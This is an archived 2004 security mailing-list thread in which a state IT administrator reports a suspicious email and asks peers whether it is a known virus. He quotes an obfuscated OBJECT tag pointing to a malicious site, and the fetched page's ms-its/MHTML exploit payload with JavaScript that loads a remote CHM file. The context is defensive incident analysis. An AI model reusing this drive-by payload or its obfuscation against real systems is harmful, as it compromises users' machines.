Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Focus-Virus
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Virus from vikord.com?

from [Bruce Martins] Network Security [Permanent Link]
Subject: Re: Virus from vikord.com?
Date: Fri, 27 Aug 2004 17:28:08 -0400 
Yes it tries to exploit a vulnerability I believe sorry for being vague but not 
on a pc right now

Bruce Martins 
Systems Administrator
EXTEND>>MEDIA
190 Liberty Street
Toronto, Ontario
M6K 3L5
_________________________
e :  bmartins@extend.com
t :  (416) 535-4222, ext 2307
f :  (416) 535-1201 
http://www.extend.com

--------------------------
Sent from my BlackBerry Wireless Handheld


-----Original Message-----
From: Mason, Samuel <smason@state.mt.us>
To: focus-virus@securityfocus.com <focus-virus@securityfocus.com>
Sent: Fri Aug 27 14:05:08 2004
Subject: Virus from vikord.com?

Hello all,

I'd like to see who else has run into this problem. 

We had a user receive a mail from what was supposed to me another State
employee. The email had a GIF attachment (2.gif) With the subject line of
"2".

The GIF file was invalid and only contained the characters "45451212"

The HTML in the message included this:

<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>

which resolved to www.vikord.com.default.htm. The site is down with a
"Service Temporarily Unavailable" message due to maintenance or capacity
problems. 

I Googled for an answer and got a little info that included this:


Quick snag with wget:

wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                           ] 350           --.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
    <object
data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/defa
ult.htm"
type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
   
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
tion.href.inde
xOf('default.htm'))));
</script>

Which seems to indicate the original intent was to download a CHM file,
correct?

I'd like to know if someone else has seen this. Is this a known virus or
something that I just could not find info for? The website is down, which is
good, but how can we mitigate this on a more permanent basis? Our
workstations indicated that the AtiveX control could not run and the page
would not display properly but I am concerned that users may have lower
security settings somewhere in the enterprise.

Thanks for any help.


Samuel Mason, CISSP
OCP, Information Technology Services Division
State of Montana
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  FW: system32\winamp.exe, Eric Stevenson
Next by Date:  re: system32\winamp.exe, Eric Stevenson
Previous by Thread:  RE: Virus from vikord.com?, Nick FitzGerald
Next by Thread:  RE: Virus from vikord.com?, Fredericks, Michael J
Indexes:  [Date] [Thread] [Top] [All Lists]